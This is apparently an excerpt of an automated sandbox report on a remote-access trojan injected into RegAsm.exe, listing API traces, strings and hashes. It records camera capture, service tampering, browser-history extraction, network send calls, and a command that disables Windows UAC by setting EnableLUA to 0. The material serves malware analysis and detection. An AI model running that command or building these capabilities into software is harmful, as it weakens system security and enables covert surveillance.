              • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: H_prologSleep
              • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
              • API String ID: 3469354165-3054508432
              • Opcode ID: cda6b0fbff319c628721655c4fa246e2f3a2f768a0df06d81a35272adc1baa10
              • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
              • Opcode Fuzzy Hash: cda6b0fbff319c628721655c4fa246e2f3a2f768a0df06d81a35272adc1baa10
              • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
              APIs
                • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
              • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
              • String ID:
              • API String ID: 3950776272-0
              • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
              • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
              • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
              • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: __cftoe
              • String ID:
              • API String ID: 4189289331-0
              • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
              • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
              • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
              • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ChangeConfigManager
              • String ID:
              • API String ID: 493672254-0
              • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
              • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
              • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
              • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
              APIs
              • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
              • _free.LIBCMT ref: 0044824C
              • _free.LIBCMT ref: 00448274
              • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
              • _abort.LIBCMT ref: 00448293
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
              • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
              • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
              • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
              • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
              • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
              • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ClassCreateErrorLastRegisterWindow
              • String ID: 0$MsgWindowClass
              • API String ID: 2877667751-2410386613
              APIs
              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
              • CloseHandle.KERNEL32(?), ref: 004077AA
              • CloseHandle.KERNEL32(?), ref: 004077AF
              Strings
              • C:\Windows\System32\cmd.exe, xrefs: 00407796
              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseHandle$CreateProcess
              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
              • API String ID: 2922976086-4183131282
              Strings
              • SG, xrefs: 004076DA
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              • API String ID: 0-97610266
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
              • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
              • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              APIs
              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
              • CloseHandle.KERNEL32(?), ref: 00405140
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
              • String ID: KeepAlive | Disabled
              • API String ID: 2993684571-305739064
              APIs
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
              • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
              • Sleep.KERNEL32(00002710), ref: 0041AE07
              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: PlaySound$HandleLocalModuleSleepTime
              • String ID: Alarm triggered
              • API String ID: 614609389-2816303416
              APIs
              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
              • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
              • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
              Strings
              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Console$AttributeText$BufferHandleInfoScreen
              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
              • API String ID: 3024135584-2418719853
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              APIs
                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • _free.LIBCMT ref: 00444E06
              • _free.LIBCMT ref: 00444E1D
              • _free.LIBCMT ref: 00444E3C
              • _free.LIBCMT ref: 00444E57
              • _free.LIBCMT ref: 00444E6E
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$AllocateHeap
              • String ID:
              • API String ID: 3033488037-0
              APIs
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
              • _free.LIBCMT ref: 004493BD
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00449589
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
              • String ID:
              • API String ID: 1286116820-0
              APIs
                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
              • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
              • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
              • String ID:
              • API String ID: 4269425633-0
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
              • __alloca_probe_16.LIBCMT ref: 004511B1
              • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
              • __freea.LIBCMT ref: 0045121D
                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
              • String ID:
              • API String ID: 313313983-0
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
              • _free.LIBCMT ref: 0044F3BF
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              APIs
              • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
              • _free.LIBCMT ref: 004482D3
              • _free.LIBCMT ref: 004482FA
              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              APIs
              • _free.LIBCMT ref: 004509D4
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 004509E6
              • _free.LIBCMT ref: 004509F8
              • _free.LIBCMT ref: 00450A0A
              • _free.LIBCMT ref: 00450A1C
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              APIs
              • _free.LIBCMT ref: 00444066
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00444078
              • _free.LIBCMT ref: 0044408B
              • _free.LIBCMT ref: 0044409C
              • _free.LIBCMT ref: 004440AD
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              APIs
              • _strpbrk.LIBCMT ref: 0044E738
              • _free.LIBCMT ref: 0044E855
                • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
              • String ID: *?$.
              • API String ID: 2812119850-3972193922
              APIs
              • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CreateFileKeyboardLayoutNameconnectsend
              • String ID: XQG$NG$PG
              • API String ID: 1634807452-3565412412
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: `#D$`#D
              • API String ID: 885266447-2450397995
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
              • _free.LIBCMT ref: 00443540
              • _free.LIBCMT ref: 0044354A
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              • API String ID: 2506810119-472202380
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65941986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
              • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
              • String ID: /sort "Visit Time" /stext "$0NG
              • API String ID: 368326130-3219657780
              APIs
              • SystemParametersInfoW.USER32 ref: 0041CAD7
                • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateInfoParametersSystemValue
              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
              • API String ID: 4127273184-3576401099
              • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
              • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
              • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
